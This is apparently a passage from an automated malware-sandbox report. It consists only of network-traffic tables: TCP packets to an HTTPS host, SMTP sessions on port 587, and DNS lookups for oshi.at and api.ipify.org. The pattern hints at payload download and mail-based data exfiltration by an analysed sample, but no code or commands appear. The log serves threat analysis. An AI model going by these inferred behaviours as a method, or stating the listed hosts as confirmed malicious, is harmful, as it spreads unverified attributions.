                                                                                  Dec 3, 2024 15:16:22.236669064 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.236735106 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.238159895 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.238223076 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.240490913 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.240557909 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.243083000 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.243146896 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.244224072 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.244270086 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.885629892 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.885734081 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.887171030 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.887228966 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.889729977 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.889786005 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.891140938 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.891213894 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.893603086 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.893676043 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.896092892 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.896152973 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.897578001 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.897643089 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.899904966 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.899969101 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.901360035 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.901423931 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.927459955 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.927558899 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:22.929876089 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:22.929941893 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.073654890 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.073776007 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.074754000 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.074822903 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.076947927 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.077016115 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.163978100 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.164098024 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.165450096 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.165529966 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.167845964 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.167922020 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.170669079 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.170753002 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.170778990 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.212202072 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.395236015 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.395395041 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.397540092 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.397618055 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.400208950 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.400266886 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.595694065 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.595777988 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.595799923 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.595845938 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.639338970 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.639446020 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.640265942 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.640326977 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.860505104 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.860652924 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.862000942 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.862073898 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.864413977 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.864487886 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.866986990 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.867082119 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:23.868665934 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:23.868766069 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.091576099 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.091653109 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.092798948 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.092864990 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.363442898 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.363537073 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.365185022 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.365257025 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.367681026 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.367743015 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.370001078 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.370052099 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.621133089 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.621294975 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.623287916 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.623373985 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.625627041 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.625710011 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.626873016 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.626935959 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.835890055 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.836041927 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.838462114 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.838543892 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.839931965 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.840006113 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:24.842538118 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:24.842616081 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.066401958 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.066555023 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.068568945 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.068650007 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.070620060 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.070694923 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.264095068 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.264233112 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.264269114 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.264313936 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.295460939 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.295595884 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.298124075 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.298230886 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.300272942 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.300353050 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.301625967 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.301695108 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.465167999 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.465266943 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.523377895 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.523499966 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.526021957 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.526443005 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.526896000 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.526943922 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.787962914 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.788062096 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.790004015 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.790069103 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.792350054 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.792414904 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.794953108 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.795017004 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.796372890 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.796427965 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.798734903 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:25.798787117 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:25.989464998 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.011631966 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.011758089 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.011785984 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.011832952 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.013871908 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.013969898 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.435709953 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.435859919 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.438210011 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.438285112 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.440071106 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.440149069 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.442948103 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.443021059 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.444947958 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.445013046 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.445045948 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.445091963 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.667754889 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.667907953 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.669987917 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.670053005 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.943430901 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.943551064 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.946680069 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.946769953 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.948147058 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.948220968 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.950453997 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.950532913 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:26.950592041 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:26.993351936 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.231834888 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.231934071 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.234200954 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.234265089 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.431996107 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.432147980 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.465606928 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.465843916 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.467750072 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.467825890 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.470012903 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.470093966 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.471411943 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.471482992 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.695493937 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.695647955 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.697679043 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.697767973 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.700208902 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.700274944 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.701694965 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.701750994 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.931427956 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.931540012 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.933964968 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.934045076 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.935436010 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.935497999 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.938091993 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.938169003 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:27.939234018 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:27.939297915 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.173541069 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.173646927 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.175906897 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.175977945 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.178292990 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.178488970 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.179773092 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.179838896 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.182070017 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.182133913 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.376616955 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.404263020 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.404335976 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.404371023 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.404417038 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.404479027 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.446476936 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.639635086 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.639648914 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.639789104 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.642108917 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.642118931 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.642194033 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.643614054 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.643677950 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.646106005 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.646186113 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.648478031 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.648542881 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.649915934 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.649991035 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.650964975 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.696433067 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.871567965 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.871578932 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.871716022 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.874025106 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.874032974 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.874141932 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.875297070 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.875375986 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.977849960 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.977982044 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.980494976 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.980581999 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.980638981 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.980700016 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.980712891 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.980729103 CET44349714194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:16:28.980784893 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:28.983942986 CET49714443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:16:40.575285912 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:40.575331926 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:40.575460911 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:40.578589916 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:40.578603029 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:41.800132036 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:41.800203085 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:41.802113056 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:41.802123070 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:41.802376032 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:41.852719069 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:41.852838993 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:41.895339966 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:42.250417948 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:42.250490904 CET44349719104.26.13.205192.168.2.8
                                                                                  Dec 3, 2024 15:16:42.250585079 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:42.253681898 CET49719443192.168.2.8104.26.13.205
                                                                                  Dec 3, 2024 15:16:42.707261086 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:42.827353001 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:42.827517033 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:44.066595078 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:44.066879988 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:44.189030886 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:44.458098888 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:44.458395958 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:44.579399109 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:44.848861933 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:44.849260092 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:44.969280005 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:45.246509075 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:45.246934891 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:45.366965055 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:45.638490915 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:45.638801098 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:45.758811951 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.035428047 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.035665035 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:46.155721903 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.428548098 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.430602074 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:46.430602074 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:46.430602074 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:46.430635929 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:16:46.550805092 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.550818920 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.550838947 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.550843000 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.930126905 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.977772951 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:17:46.883614063 CET49713587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:22.728344917 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:22.851254940 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:18:23.119896889 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:18:23.120029926 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:18:23.120081902 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:23.121831894 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:23.240056992 CET58749720162.254.34.31192.168.2.8
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 3, 2024 15:15:43.380554914 CET5435353192.168.2.81.1.1.1
                                                                                  Dec 3, 2024 15:15:43.520683050 CET53543531.1.1.1192.168.2.8
                                                                                  Dec 3, 2024 15:16:03.640193939 CET5580753192.168.2.81.1.1.1
                                                                                  Dec 3, 2024 15:16:03.780316114 CET53558071.1.1.1192.168.2.8
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 3, 2024 15:15:43.380554914 CET192.168.2.81.1.1.10x770eStandard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                  Dec 3, 2024 15:16:03.640193939 CET192.168.2.81.1.1.10x220bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 3, 2024 15:15:43.520683050 CET1.1.1.1192.168.2.80x770eNo error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                  Dec 3, 2024 15:15:43.520683050 CET1.1.1.1192.168.2.80x770eNo error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                  Dec 3, 2024 15:16:03.780316114 CET1.1.1.1192.168.2.80x220bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
